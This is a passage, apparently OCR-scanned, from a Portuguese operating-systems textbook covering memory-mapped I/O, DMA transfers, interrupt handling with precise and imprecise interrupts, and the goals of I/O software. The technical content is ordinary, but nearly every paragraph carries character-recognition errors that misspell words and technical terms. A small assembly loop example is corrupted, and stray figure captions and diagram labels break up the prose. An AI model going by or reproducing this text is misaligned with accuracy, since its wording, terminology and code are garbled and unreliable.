apresentam vantagens e desvantagens especfficas. Yamos 
analisar as vantagens da E/S mapeada na memória. Primei¬ 
ro, quando sao liecessarias mstruęoes especiais de E/S para 
ler ou escrever nos registradores dos disposiiivos, o acesso 
a des requer o uso dc códigos especfficos cm assembly, pois 
nao existc nenlium modo dc cxecutar inna instmęao IN 
ou OUT cm C ou C++. Uma cha mada a esse proccdimcnto 
acarreta umcuśtoadidonal ao controle dc E/S. Enlretanlo, 
com E/S mapeada na memória, os registradores de controle 
do dispositivo sao apenas variaveis na memória e podem 
ser endereęadas em C da mesma maneira que qualquer 
outra variavel. Assim, com E/S mapeada na memória, um 
drivcr do dispositivo de E/S pode ser escrito lotalmemc em 
C, ScmE/S mapeada na memória, algum código em assem- 
bly e necessario, 

Em segundo Ittgar, quando se emprega a E/S mapeada 
na memória, nao e preciso qualqner mecanismo de pro- 
teęao espeeial para impedir que os proeessos do usuario 
c?ceculeni E/S, Tudo o que o sistema operacional tem de 
fam c deixar dc mapcai aąuela poręao do cspaęo dc cndc- 
reęamento assoriada a os registradores de eon troić no cspaęo 
dc endereęamento virtual do usuario, Melhor ainda, se cada 
dispositivo tem sous registradores de controle cm uma pa gin a 
diferente do espaęo de endereęamento, o sistema operacional 
pode dar a um usuario — e nao dar a outros — o controle 
sobre dispositivos especfficos, simplesmente incluindo as 
paginas desejadas em sua tabela de paginas. Esse esquema 
pode permliir que diferentes drivers de dispositwos sejam 
colocados em diferentes espaęos de endereęamemo, o quc 
nao s ó red u z o tamanho do nucleo do sistema operacional 
como tambem impede que cada driver interfira nos outros. 

Em tcrceiro lugar, com E/S mapeada na memória, cada 
insiruęao capa z de referenda r a memória pode tambem 
rderenciar os registradores de controle. Por exemplo, se 
exisle uma insiruęao, TEST r quc testa sc uma palavra de 
memória e 0, ela tambem pode ser usada para tesiar se um 
registrador de controle Ć0 — podendo, nesse caso, ser 
um sinal de que o disposilivo esta ocioso e, assim, apto a 
aceitar um novo comando. O código em lingua gem assem- 
bly pode ser visto da seguinte maneira: 

LOOP: TEST PORT_4 // verifica se a porta 4 ó 0 
BE G RE ADY // se for 0 f salta para 

BRANCH LOOP // caso contr&rio, continua 
tostando 

READY: 

Se a E/S mapeada na memória nao esta preser;te, o 
registrador de controle deve, primeiro, ser lido para a CPU 
e depois testado, predsando, assim, de duas instruęóes em 


vez de uma. No caso do laęo mostrado no código anterior, 
uma ąuarta instruęao tem de ser adidonada, atrasando li- 
geiramenie a detecęao da ociosidade do disposit|vo- 

No projeto de computadores, praticamente tudo en- 
volve analise de custo e beneficio, e esse e o caso aqui tam¬ 
bem. A E/S mapeada na memória apresenta suas dcsvan- 
tagens especificas* Primeiro, a maioria dos computadores 
atuais usa alguma forma de cache para as palavras de me¬ 
mória. O uso de cache para os registradores de controle 
do dispo$itivo seria desastroso. Comidere o exemplo dado 
anteriormente, de laęo em código assembty na presenęa de 
cache, A primeira rcfcrćneia a P0RT_4 faria o referido cn- 
dereęo ser colocado na cache, As referendas subseąuentes 
simplesmente obteriam o rnestno valor diretamente da ca- 
che e nao mais perguntariam ao dispositivo. Entao, quan- 
do finalmente o dispositivo ficasse pronto, o pr ogra ma nao 
teria como descobrir isso. Alem disso, o laęo entraria em 
repeticao infinita. 

Para evitar essa situaęao com a E/S mapeada na me¬ 
mória, o hardware deve ser equipado com a capaddade 
dc dcsabililar sdetivamcnic a cache — por cxemplo, em 
um csąucma dc desabilitaęao por pagina. Essa caractcrfs- 
tica adiciona complexidade tamo ao hardware qitamo ao 
sistema operacional o qual deve gerenciar o uso selerivo 
da cache* 

Em segundo iugar, sc existc somentc um cspaęo dc 
endereęamento, todos os módulos de memória e todos os 
disposiiivos de E/S devem examinar todas as referenci as 
de memória para verificar quais devem ser respondidas 
por cada um, Se o computador tem um tinico barramen- 
to, como ocorre na Figura 5*2(a), cada componente pode 
olhar cada endereęo diretamente. 

Gontu do, a tendencja nos computadores pessoais mo- 
demos c ter um harmmento dc memória dc alta vcloridadc 
dcdicado, como mostra a Figura 5.2{b} J uma propriedadc 
tambem enconirada nos computadores de grandę porte* 
Esse barramento e feito para otiinizar o desempenho da 
memória, sem qualquer compromisso quanto aos interes- 
ses dos disposiiivos de E/S lentos* Os computadores Pen¬ 
tium podem possuir miihiplos barramentos (memória, PCI, 
SCSI, USB, ISA), como sc observa na Figura 1*12* 

Quando se tem um barramento de memória sępa rado 
em maquinas mapeadas na memória, surge a preocupaęao 
de quc os dispositivos de E/S nao tem como enxergar os 
endereęos de memória ąuando estes sao lanęados no bar¬ 
ramento da memória, de modo que des tambem nao tem 
como responder. Novamente, medidas especiais precisam 
ser adotadas para permitir quc a E/S mapeada na memó¬ 
ria fundonc em um sistema com varios barrameotos. Uma 
soluęao pode ser primeiro enviar todas as referendas de 
memória para a memória, *Se esia falha para responder, en- 
tao a CPU tema os outros barramentos. Esse projeto e exe- 
quivd # mas reąuer complexidade adidonal de hardware* 
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Todos os endereęos Barramento 

(memória e E/S) passam por aqui 


mória. Os endereęos que caem demro de uma dessas faixas 
marcadas sao transferidos para o barramento PCI em vez 
dc seguirem para a memória. A desvantagem desse esque- 
ma e a necessidadc de caleular, em tempo de inidalizaęao 
do sistema r quais endereęos dc memória nao sao, na verda- 
dc, endereęos dc memória. Assim, ca da esąuema apresenta 
pontos favoravris c contrarios, de modo quc os compro- 
missos e as ava)iaędcs de custo-benefido sao inevitaveis. 


(a) 

CPU 1§ e escreve na memória utllizando 
esse barramento de alta ueJocidade 



Esta porta de memória 
perm i te que os disposftivos de 
E/S acessem a memória 


fb) 

I Figura 5*2 (a) Arquitetura com barramento unico. 

(b) Arquitetura de memória com barramento duplo. 

Urn segimdo projeto poderia ser colo car urn disposi- 
tivo de escuta no barramento da memória para repassar, 
aos dispositivos de E/S potencialmente interessados, todos 
os endereęos apresentados. O pr obiema, nesse caso, c que os 
dispositivos de E/S podem nao ser capazes de processar 
as requisięoes na mesma veloridade da memória* 

Urn terceiro metodo, usado na configuraęao do Pen- 
tiiim da Figura 1.12, consiste em filtrar os endereęos no 
chip da p on te PCI. Esse chip contem registradores que sao 
pre-carregados com faixas de endereęos reservados duran- 
te o processo de inidalizaęao do sistema operadonaL Por 
exemplo, de 640 K a i M - 1 poderia ser marcado como 
uma faixa tle endereęos resen ada nao uti)izavd como mc- 


5.1.41 Acesso direto a memória (DMA) 

Nao imperia se a CPU leni ou nao E/S mapcada na me¬ 
mória: da predsa endercęar os controladores dos dispositi- 
vos para poder trocar dados com clcs, A CPU pode reąuisitar 
dados de urn controlador dc H/S, um byle dc cada vcz, mas, 
fazendo isso, desperdięa muiio tempo de CPU, de modo 
que um esquema diferente, chama do de acesso direto 
a memória {direct mzmory access — DMA), muitas vezes ć 
usado. O sistema operacional semenie pode usar DMA se o 
hardware tern o controlador de DMA, cxisiente na maioria 
dos sisiemas. Algo mas vezes, esse controlador e imegrado 
nos controladores de disco e cm outros controladores, mas 
esse projeto requcr um controlador dc DMA separado para 
cada dispositivo, Normalnienie, um unico controlador de 
DMA se encontra disponwei (por excmp1o, rta płaca-mac) 
para controlar as transie rencias para varios diśposiiivos, 
as quais podem ocorrcr, muitas vezcs simultaneamente, 

Nao importa onde ele esta fisicamenie localizado: o 
controlador dc DMA tein acesso ao barramento do sistema 
independente da CPU, como mostra a Figura 5.3. Ele con- 
lem varios registradores que podem ser lidos e escritos pela 
CPU, os ąiiais indu cm: um registrador dc endereęamento 
dc memória, um registrador contador de bytes e um ou 
mais registradores de controle* Os registradores dc controle 
especificam a porta dc H/S cm uso, a direęao da transferem 
eia (leitura do dispositivo dc E/S ou escrita para o dlsposUi- 
vo de E/S), a unitlade de transferencia (um byle por vez ou 
uma palavra por vez) e o mi mero de bytes a ser transferido 
em um surto. 


Dispositivo 


CPU 


1. CPU 
próg ranna 
o controlador 
de DMA 


Controlador 
de DMA 


Controlador 
de disco 



4, Confirmagao 


Interrompe quando 
conclufdo 


2. DMA solicita transfe¬ 
rencia para a memória 


1 Buffer 


Memória 

Principal 


v 3. Dados tran sferi dos j 


■Barramento 


| Figura 5.3 Operagao de transferencia utiiizando DMA. 
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Para explicar como o DMA fimciona, vamos primeiro 
observar como e fdla u ma leitura no disco quando o DMA 
nao e usado. A principio o controlador Ie urn bloco (nm ou 
mais setores) do dispositivc serialmente, bit a bit, ate que 
todo o bloco cstcja no buf ter interno do controlador. Em 
seguida, cle caIcula a soma dc vedficaęao para conferir se 
11 ao ocorrcii nenhum cno de leitura. Entao* o controlador 
causa u ma inlerrupęao. Quando o sistema opcracional ini- 
cializa o a ten di niemo, de pode ler o bloco do disco a parli r 
do buffer do controlador, nm byle ou u ma pa!avra de cada 
vez, em nm laęo, onde cada iteraęao le u ni byle ou pala- 
vra do registrador do controlador e amiazena na memória 
prineipal. 

Quando o DMA e usado* o procedimento e difcrcnie. 
Primeiro a CPU programa o controlador de DMA inserindo 
valores em sous registradores, de modo que ele saiba o que 
transferir e para onde transferir (passo 1 na Figura 5.3). 
Ele tambem emite um comando para o controlador de 
disco ordenando carregar os dados do disco para seu 
buffer interno e verificar a soma de verificaęao. Quando 
os dados que esiao no buffer do controlador sao validos r o 
DMA pode comeęar. 

O controlador de DMA inicializa a transkrenria cmi- 
tindo, pelo barramento* uma reąuisięao de leitura para o 
controlador de disco (passo 2). Essa reąuisięao de ieiinra se 
parece com qualquer omra reąuisięao de leitura, e o contro¬ 
lador de disco nao sabe — ou nao se preocupa com isso — se 
da vem da CPU ou do controlador de DMA. Norma! men te, 
o endereęo de memória para onde escrevcr esta nas liniias 
de cndercęos do barramento, dc modo quc, ąuando o con¬ 
trolador de disco busca a próxima palavra dc seu buffer 
interno, cle sabc onde cscrevć-la. A escrita na memória e 
oulro ciclo de barramento-padrao (passo 3)- Quando a es- 
crita esta completa, o controlador de disco em ia um sinal 
de confinnaęao para o controlador de DMA, tambem por 
nieio do barramento (passo 4). O controlador de DMA, en- 
tao, ineremema o endereęo de memória e diminui o conta- 
dor de byłeś. Se o contador de bytes ainda e maior do que 
0, os passos de 2 a 4 sao repetidos ale que o contador seja 0. 
Nesse momento, o controlador de DMA interrompe a CPU 
para dcixa-la dentc dc que a transfcrcncia esta completa. 
Quando o sistema opcracional inicializa o atendimento da 
intcrrupęao, cle nao prccisa copiar o bloco do disco para a 
memória; ele ja esta la* 

Os controladores de DMA wiriani consideravelmente 
em termos de softsticaęao. Os mais simples mitam uma 
transfcrcncia por vcz, conforme descrito anteriormente. 
Os mais comp!exos podem ser programados para lidar com 
multiplas transfcrcncias simultancamentc. Alguns contro¬ 
ladores tern internamentc varios conjuntos dc registrado- 
res, u ni para cada canal. A CPU inicializa carregando cada 
conjunto de registradores com os parametros rdevantes 
para sua transferencia. Cada iransferencia deve usar um 
controlador de dispositivo diferente. Após cada palavra ser 
transferida (passos 2 a 4) na Figura 5,3, o controlador de 


DMA decide ąual dispositivo sera o próximo a ser atendido. 
Ele pode ser configurado para usar um algoritmo de alter- 
nanria circular [ roitnd-rohin) ou ter um esąuema de priori - 
dade projetado para favorecer alguns dispositivos sobre os 
outros. Diversas rcąuisięóes a diferentes controladores de 
dispositivos podcm e star pendent es em um dado momen- 
to, desdc que cxisla uma mancira nao ambigua para iden- 
tificar sępa rada menie os sin ais de confirmaęao. Por esse 
motivo* muitas vezes uma linha diferente de confinnaęao 
no barramenio e usada para cada canal de DMA. 

Muitos barramentos podem operar em dois modos: 
modo palavra {word-at-a-tnm mak) c modo bloco. Alguns 
controladores dc DMA tambem sao capazcs dc operar cm 
ambos os modos. No primeiro, a opcraęao funtioiia como 
desenia anteriormente; o controlador de DMA solicita a 
transkrencia de uma palavra e consegue, Se a CPU tam¬ 
bem ąuiser o barramento, ela Lem de esperar. O mecanis- 
mo e cha mado de roubo de ciclo {cych stealing), pois o 
controlador do dispositivo rouba da CPU um ciclo de barra¬ 
mento a cada vez, atrasando-a um pouco. No modo bloco, 
o controlador de DMA diz ao dispositivo para obter o barrn- 
mento, emite unia serie de transferencias e, entao, libera o 
barramento. Esse modo dc opcraęao c cbamado dc modo 
de surto (burstmode), E mais clicicntc do quc o anterior, 
pois varias palavras podem ser transferidas com uma linica 
aąuisięao dc barramento (a aąuisięao do barramento leva 
tempo). A desvantagem do modo suito e ąue ele pode blo- 
ąuear a CPU e outros dispositivos por um penodo grandę 
de tempo, easo um longo surto tenha de ser transferida. 

No rnodelo discutido ate aqui, tambem cha mado dc 
modo direto [fly-by modę), o controlador de DMA diz para 
o controlador do dispositivo transferir dados direlamentc a 
memória prineipal. Um modo alternativo que alguns con¬ 
troladores de DMA usani estabekce que o controlador do 
dispositivo deve eiwiar a palavra para o controlador de DMA, 
que por sua vez reąuisiia o barramento pela segunda vez 
para escrever a palavra para ąualąuer que seja o seu des- 
tino. Esse esąuema requer um ciclo extra de barramento 
por palavra transferida, mas e mais flexfvd pelo fato de 
permitir a realizaęao de cópias de dispositivo para dispo- 
sitivo e tambem de memória para memória (emitindo 
uma reąuisięao de leitura a memória seguida dc uma re¬ 
ąuisięao de escrita a memória, em cndercęos diferentes). 

A maioria dos controladores de DMA usa endereęa- 
mento de memória ffsica para suas transferencias. O uso 
de endereęos de memória fisi ca reąuer que o sistema opc¬ 
racional converta o endereęo virtual do buffer dc memória 
pretendido cm um endereęo ffsico c cscrcva esse endereęo 
fisico no rcglstrador dc endereęo do DMA, Um esąuema 
alternativo empregado cm alguns controladores de DMA se 
baseia cm escrever o próprio endereęo virtual no controla¬ 
dor de DMA. Entao o controlador de DMA devc usar a uni- 
dade de gerentiamemo de memória (memory mamgemenł 
unh — MMU) para fazer a iraduęao de endereęo virtual 
para ffsico. Somente no caso em que a MMU e parte da 
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memória (possfyel, mas raro), e nao da CPU, os endereęos 
virtuais sao colocados no barramento. 

Mcndonamos quc o disco priiudro carrcga dados cm 
sous buffers mternos antcs que o DMA possa irurializar, 
Voce deve estar se pergumando por que o comrolador sim- 
plesmeme nao armazena os bytes na memória prindpal 
logo que eles sao obtidos do disco. Em om ras palavras: por 
que elc necessita de urn buffer i niemo? Esistem duas ra- 
zóes para isso. Primeiro, fazendo armazenamento interno, 
o comrolador de disco pode realizar a conferencia da soma 
de yerificaęao antcs de inicializar a transferenda. Sc essa 
yerificaęao ć incorreta, um erro e sinalizado c ncnhumn 
transferenda sc rcaliza. 

A segunda razao e que, depots de inidaUzada a iransfe- 
renria, a taxa de chegada dos bits do disco e maniida cons- 
tante, quer o controlador esleja pronlo para eles, quer nao. 
Se o controlador tentasse escrever dados di r eta men te na 
memória, ele teria dc accssar o barramento do sistema para 
cada palavra translerida. Sc o barramento estivcssc ocupa- 
do por outros dispositłvos (por cxemplo, no modo surlo), o 
controlador teria de esperan Sc a palavra scguiiitc do disco 
chcgassc antcs dc a ariterioi ter sido armazenada, o contro- 
lador seria obrigado a armazena-la em alguin lugan Se o 
barramento estivesse muito ocupado, o controlador pode- 
ria acabar len do de armazenar um numer o consideravel de 
palavras alem de tambem ter de realizar uma grandę quan- 
tidade de gerenciamento. Ouando o bloco e armażenado 
intern a menie, o barramento nao se faz necessario ale que 
o DMA comece e, por essa razao, o projeto do controlador ć 
muito mais simples, pois utilizando DMA o tempo dc trans- 
fcrcncia para a memória nao c um fator critico. (Alguns 
controladores mais vclhos iam, dc lato, diretamente para 
a memória com apenas uma pcquena ąuantidade de ar- 
mazenamento interno, mas, quando o barramento estava 
muito ocupado, normaltnente a transferenda era termina- 
da com um erro de owrnm -- transbordo de pillia.) 

Nem todos os computadores usam DMA, pois se ar¬ 
gumentu quc a CPU prindpal c normalnienie muito mais 
vdoz do quc o controlador de DMA c pode fazer o trabalho 
muito mais rapido (quando o fator limitame nao e a velo- 
cidade do dispositiyo de E/S). Se nao existe outro trabalho 
para da realizar, nao tern sentido a CPU (rapida) ter de es- 


perar pelo controlador de DMA (lento) acabar. Alem disso, 
liyrar-se do comrolador de DMA e deixar a CPU fazer lodo 
o trabalho via software economiza dinheiro — fator impor- 
tatite para os computadores de baixo custo (cmbarcados). 

5.1.51 Interrupęoes revisitadas 

Na Seęao L4.5, abordamos dc passagem as interrup- 
ęoes, mas existe mais a ser dito. Em um sistema tfpico de 
computador pessoal, a estrutura de interrupęoes e como 
mosirada na Figura 5.4. Em hardware, as interrupęoes tra- 
balliam da seguinte maneira: quando urn dispositiyo de 
E/S finaliza seu trabalho, ele gera uma interrupęao (pre- 
sumindo quc as inierrupęóes tenham sido habilitadas pelo 
sistema operacional). Ele faz isso enviando um sinal pela 
linha do barramento a qual cshi associado, Essc sinal e dc- 
tcctado pelo chip comrolador de interrupęao localizado na 
płaca-mac, oqual, entao, dedde o quc fazer. 

Se nenhuma outra interrupęao esta pendente, o con¬ 
trolador de interrupęao processa a interrupęao i media ta¬ 
nienie. Sc outra interrupęao esta cm tratamento ou outro 
dispositiyo Fez uma rcquisięao simultanea cm uma linha 
dc reąuisięao de interrupęao dc maior prioridade no bar- 
ramemo, o dispositiyo e simplesmente ignorado naquele 
memento. Nesse caso, ele continua a gerar um sinal de in¬ 
terrupęao no barramento a te ser a ten di do pela CPU. 

Para tratar a interrupęao, o controlador coloca um nu- 
mero nas linhas dc endereęo cspcdficando qual dispositiyo 
requer atenęao c repassa um sinal para imerromper a CPU. 

O sinal de interrupęao faz com que a CPU parę aquilo 
quc esta fazendo c inicic outra atiridade, O nu mero nas 
linhas de endereęo e usado como mdtce em uma tabela 
cha mada vetor de interrupęoes para buscar um novo 
comador dc programa. Esse comador de programa aponta 
para o infcio da rotina de trataniemo da interrupęao cor- 
respondeme. Em geral, as interrupęoes de software (traps) 
e de hardware usam o mesmo mecanismo desse porno em 
diantc e freąiicntementc compartilham o mesmo vetor dc 
interrupęoes, A locaęao do vetor dc internipęóes pode ser 
feita fisicamente na maquina ou estar cm algum lugar da 
memória, com urn registrador da CPU {carregado pelo sis- 
terna opcrncional), quc aponta para sua origem. 



3. CPU confirma 
a interrupęao 
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I Figura 5.4 Como ocorre uma interrupęao. As cones<Q 0 s entre os dispositiyos e o controlador de internupęao atualmente utilizam 
linhas de interrupęao no barramento, em vez de cabos dedicados. 
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Imediaiamente após o infdo da execuęao, a rotina de 
iratamento da interrupęao confirma a interrupęao escre- 
vendo um certo valor era urna das portas de E/S do eon- 
iroJador de interrupęao. A confimiaęao diz ao controlador 
quc ele esta livre para repassar ontra interrupęao. O fato 
de a CPU atrasar cssa confirmaęao atć que esteja livrc para 
!idar com a próxima interrupęao faz corn quc sc evitein 
as condiędes de corrida que envoIvem multiplas iiUerrup- 
ęóes (quase simultaneas), Corwem acrescemar que alguns 
compuiadores (antigos) nao tein um chip controlador de 
interrupęao centralizado, de modo que cada controlador 
de dispositko efetua direiameme sua própria reąuisięao. 

O hardware sempre saka ccrtas mformaęoes antes de 
inidalizar a rotina dc Iraiamento da intermpęao. Quais 
infontiaęoes sakar e onde das sao sakas varia considc- 
ravdmeme de CPU para CPU. No mftiimo, o contador de 
pr ogra ma deve ser sake, de modo que o proeesso inter- 
rompido possa ser reinicializado. Em ultimo caso, todos os 
registradores visfveis e um grandę numero de registradores 
internos tambem podem ser salvos. 

Urna ąuestao importante e onde sakar cssas i n forma- 
ęÓes, U ma opęao e inseri-las nos registradores intemos de 
maneira que o sistema operackmal possa ler ąuando neces- 
sario. Um próbie ma desse metodo e que o controlador de 
interrupęao nao pode receber u ma confirmaęao ate que to- 
das as informaęoes potencialmente relevantes tenham sido 
lidas, para que urna segunda interrupęao nao sobreponha 
os registradores internos durante o sakamento. Essa esira- 
tegia acarreta longos periodos de tempo perdidos quando 
as intcrrupęocs sao desabilitadas e posskeimente tambem 
perdas de intcrmpęocs c de da dos, 

Conseąuentemente, a maioria das CPUs saka as in¬ 
formaęoes em urna pilha. Conludo, isso tambem apresenta 
problemas, Para comeęar, de quem e a pilha? Se e usada a 
pilha atu ab da pode muito bera ser urna pilha do proeesso 
do usuario. Afem disso, o ponteiro da pilha pode ate nao 
serlegitimo, o que causara um erro fala! ąuando o hardwa- 
rc tcniar escrcver algumas palavras nelc* Ele tambem pode 
apontar para o finał de urna pa giną. Após v arias esci itas na 
memória, o linii te da pagina pode ser ultrapassado e unia 
falta de pagina pode ser gerada, A ocorreneia de urna falta 
de pagina durante o processamento de unia interrupęao de 
hardware eria um problema maior: onde sakar o esta do 
para tratara falta de pagina? 

Se for usada a pilha do micie o do sistema operadonal 
existe uma probabilklade muito maior de o ponteiro da pi¬ 
lha ser legftimo e apontar para unia pagina na memória. 
Coniudo, o chaveamemo para o modo mi cle o pode reque- 
rer a troca dos contextos da MMU e provavelmente uwa¬ 
li dar a maior parte da caclie — ou toda ela — e a tabela de 
traduęao de endereęos {trans lat km kokaside huffer — TLEJ). 
A recarga de toda essa informaęao, estatica ou dinamica- 
mente, aumenta o tempo de processamento da interrupęao 
e, assim, desperdięa tempo de CPU. 


Interrupęoes precisas e imprecisas 

Outro problema e causa do pelo fato de que a maioria 
das CPUs modernas e projetada com pipelines profundos 
e, inuiias vezes, superescalares (paralelismo interno). Nos 
sistemas mais antigos, após cada instruęao finalizar sua 
execuęao, o microprograma ou hardware era verificado 
para ver se havia uma interrupęao pendente. Em caso afir- 
mativo, o contador de programa c a palavra dc estado do 
programa (program status word — PS W] cram colocados na 
pilha e a seąuencia da interrupęao comcęava* Após o ter- 
mino do tratamento da interrupęao, o proeesso reverso era 
executado, com os yalores anteriores da PS W e do coma- 
dor de programa retirados da pilha; o proeesso assodado a 
eles era, entao, reinicializado. 

Essc modelo pressupoe quc, sc uma interrupęaoocorre 
justa menie após alguma instruęao, todas as instruęoes an¬ 
teriores (induske a referida instruęao) foram executadas 
por complelo e nenhuma instruęao posterior a ela foi exe- 
cutada de nenhuma maneira. Em maąirinas antigas, essa 
suposięao sempre era valida. Nas modernas, nem sempre. 

Para os iniciantes, considere-se o modelo de pipeline 
da Figura 1.6(a). O quc acomecc sc ocorrc uma interrup¬ 
ęao enąuanto o pipeline esta cheio (o caso mais comum)? 
Mu itas instmęóes estao cm varios estagios da execuęao t 
Quando ha uma interrupęao, o valor do contador de pro- 
grama pode nao refletir a fromeira correta entre as mstru- 
ęoes executadas e as nao exeaitadas. Mais provaveimeme 
ele refletira o endereęo da próxima instruęao a ser buscada 
e colocada no pipeline, em vez do endereęo da instruęao 
que acaboił de ser processada pela imidade de execuęao. 

Em uma maquina supercscalar, como a demonstrada 
na Figura 1.7(b), as coisas sao ainda piores. As iiistruęoes 
devem ser decompostas em micro-operaęóes que podem 
ser executadas fora da ordem, dependendo da dispombili- 
dade dos recursos internos — como imidades fundonais e 
registros. No momento da interrupęao, algumas instruęoes 
previameme eiwiadas podem nao ter sido micializadas, as¬ 
sim como outras mais recentes podem estar quase co udu l 
das. Quando uma interrupęao e sinalizada, podem existir 
divcrsas insiruęócs cm diferentes estagios dc completudc, 
com menor rclaęao entre clas e o contador de programas. 

Uma interrupęao que deixa a maquina em um estado 
bera defimdo e chamada de interrupęao predsa (Walker 
e Cragon, 1995). Essa interrupęao possui quatro proprie- 
dades: 

1. O contador de programa (program w u mer — PC) e 
salvo em um lugar conhecido. 

2. Todas as instruęoes anteriores aqueła a pomada pelo 
PC foram totalmente executadas. 

3. Nenhuma instruęao posterior a apontada pelo PC 
foi executada. 

4. O estado de execuęao da instruęao apontada pelo 
PC e conhecido. 
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Noie que nao existe proibłęao para que as Lnstruędes 
posteriores a apontada pelo PC sejam inirializadas. Cabe 
apenas observar quc quaisquer alteraęoes que elas faęain 
aos registradores on a memória devcm ser desfeitas ant es 
qnc a interrupęao ocorra. Tambem ć pcrmitido nccitar a 
cxccuęao da instruęao apontada, assim como quc cla nao 
seja cxccutada, Entretanlo, c preciso estar muito claro 
qual dos dois casos se aplica, Mmtas vezes, se a intemip- 
ęao e de E/S, a imtruęao pode ainda nem ter comeęado, 
Coniudo, se esta for u ma imerrupęao de software ou fal- 
ta de pagina, entao e provavel que o PC aponte para a 
instnięao causadora da falta, de modo que ela possa ser 
reinicializada posteriornientc. A simaęao mostrada na Fi¬ 
gura 5.5(a} ilustra uma interrupęao precisa. Todas as ins- 
truęocs ate o contador dc programa (316) fora ni condui- 
das c ncnhuma das quc cstao dcpois delc foi inidalizada 
(nem retrocedcram para desfazer sens efeitos). 

Uma interrupęao que nao atende a esses requisiios e 
chama da de interrupęao impredsa e complica bastan- 
te a vida do projetisia do sistema operacional que se ve 
entao obrigado a caicular o que ja foi executado e aqui- 
Io que ainda devc ser executado. A Figura 5.5{b) mostra 
uma interrupęao impredsa, na qual diferemes instruęóes 
pradmas do contador dc programa encontram-se cm di- 
ferentes estagios dc exccuęao, c nos permitc obsci var quc 
as instruęóes mais antigas nem sempre cstao mais adianta- 
das do qtie as mais recentes. Maąuinas com imerrupęoes 
imprecisas geralmente colocam uma grandę quantidade de 
informaęao de estado interno em urna pilha para dar ao 
sistema operacional a possibilidade de caicular o que es- 
tava acontecendo. O código necessario para reinicializar a 
maąuina em geral e extremamante complicado. Da mes- 
ma forma, salvar inna grandę quantidade dc Informaęao 
na memória a ca da interrupęao torna a interrupęao lenta 
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I Figura 5,5 [a) Urna interrupęao predsa, (b) Uma tntemjpęao 
impredsa. 
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e a recuperaęao ainda piór. isso gera uma situaęao irónica, 
em que CPUs superescalares muito rapidas as vezes sao ina- 
dequadas para o trabaiho em tempo rcal em virtude da 
lentidao das interrupęoes. 

Alguns compuiadores sao projetados de modo que al- 
guns tipos de interrupęoes de software e de hardware sao 
predsos e omros nao. Por exemplo, ter interrupęoes de 
E/S precisas, mas interrupęoes causadas por erros fatais de 
programaęao imprecisas, nao e ma ideia, visto que nao e 
necessario que nenbutna tentativa seja feita para reinicia¬ 
lizar os processos em execuęao depois que estes tenham 
sido dividldos por zero. Algumas maquinas tern uni bil quc 
pode ser marcado para foręar todas as interrupęoes a serem 
precisas. A desvantagem dc ntilizar esse bit e quc dc obriga 
a CPU a registrar cuidadosamente qualquer tarefa quc ela 
esieja rcalizando e ma mer cópias de ptoteęao dos registra- 
dores, de modo que ela possa gerar unia imerrupęao preci- 
sa em qualquer instame. loda essa sobrecarga de trabaiho 
gera um impacto significativo no desempenho. 

Algumas maąuinas superescalares, como os computa- 
dores Pentium, tern interrupęoes precisas para permitir que 
os programas amigos traba!hem corretamcnte, O custo das 
interrupęoes precisas e uma lógica de imerrupęao extrema~ 
menie tomplexa dentro da CPU para gara mir que, ąuando 
o comrolador de interrupęao sinalizar que ele quer causar 
uma interrupęao, todas as instruęóes ate aquele ponto pos¬ 
sani ser condufdas e nada alem daquele ponto tenha qual- 
quer efeito constderavel sobre o estado da maąuina. Nesse 
caso, o custo e pago nao cm tempo, mas em area de chip 
e complexidade dc projeto. Sc as interrupęoes precisas nao 
fossem necessarias para garantir a compatibilidade com as 
versocs antigas, essa arca dc chip poderia ser disponibiii- 
zada para caches maiores dentro do chip, tornando a CPU 
mais rapida. Por outro lado, as imerrupęoes imprecisas dei- 
xam o sistema operacional muito mais complicado e lento 
e, desse modo, Fica diffdl dizer qttai abordagem e realmente 
melhor. 


Prindpios do software de E/S 

Deixemos de lado por enquamo o hardware de E/S 
para entrar em mais detalhes sobre o software de E/S. 
Primciro, veremos os objetivos do software de E/S e, em 
seguida, como a E/S pode ser feita do ponto de vista do 
sistema operacional. 

5.2.11 Objetivos do software de E/S 

Um conceito primordial no projeto de software de E/S 
e conhecido como independencie do dispositivo. Esse 
conceito propóe que deveria ser posswel escrever progra¬ 
mas aptos a acessar qualquer dispositivo de E/S sem a ne- 
cessidade de especiiicar antecipadamente o dispositivo. Por 
exemplo, um programa que le um arquivo como entrada 
devcria ser capaz de ler um arquivo dc um disco rigido, de 
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um CD-ROM, de u ni DVD ou de um dispositivo USB sem 
ter de modificar o progrania para cada dispositivo diferen- 
te. De modo semelhante, deveria ser possfvel digitar um 
comando como 

sort <input >output 

que traballie com u ma ciura da vinda de qualquer lipo dc dis¬ 
co ou dc um icclado, c a safda ir para qualquer lipo de disco 
ou para o monitor, Fica a cargo do sistema opcracional tratar 
dos problem as ca u sad os pelo faio de csscs dispositivos serem 
realm en te dcsiguais e ncccssitarernde seąuencias de comao- 
dos rnuito diferenies para ler ou escrcver. 

Eslrcitamemc relacionado a indcpendenda do dispo- 
sitivo csia o obje li vo da nomeaęao uniforme. O nonie 
dc um arquivo ou de um dispositivo deveria simplesmen- 
ic ser u ma cadeia de caraciercs ou um niimero inteiro to- 
lalmemc indcpendente do dispositivo. No UNIK todos os 
discos podem ser arbiirariamenic Lntegrados na hicrarąuia 
do sistema de arquivos, de modo que o u su ario nao precise 
estar ci en te de quał nomc corresponde a qual disposiiivo. 
Por exemplo, um dispositivo USB pode ser montado no 
topo do dirciório fusrłastfbackup, de maneira que copiar um 
a r q u i vo pa ra o s u b d i re tó ri o /usr/asi/backu p/monday sig n i fi ca 
copiar o arquivo para o dispositivo USB. Assim, todos os 
arquivos e dispositivos sao cndcrcęados do mesmo modo: 
pelo nomc do caminho. 

Outra ąuestao import a mc para os programas de E/S 
e o tratamento de erros. Em gerai, os erros devcriam 
ser tratados o mais próximo possivcl do hardware, Sc o 
controlador descobre um erro de leitura, de deveria ten- 
lar corrigi-lo por si próprio. Se cle nao tern condiędes de 
faze-lo, entao o driver do dispositivo dcveria tratar disso, 
talvez simplesmeme teniando ler de novo o bloco. Muitos 
erros sao transitórios, como erros de leitura causados por 
partia:las de pó sobre o cabeęote de leiiura e que frequen- 
temeiue nao oeorrem nas leituras seguintes. Somente se as 
camadas mais baixas nao fossem capazes dc tratar o probłe- 
ma ć que as camadas superiores deveriam ser infomiadas 
sobre cle. Em muitos ca sos, a reajperaęao dc um erro pode 
ser feita com transparencia em um baixo nfvel sem que os 
mveis superiores tomem conhedmento desse erro. 

Oma outra quesuo a i uda primordial e o lipo de irans- 
ferencia, que pode ser srnerona (bIoqueante) ou assm- 
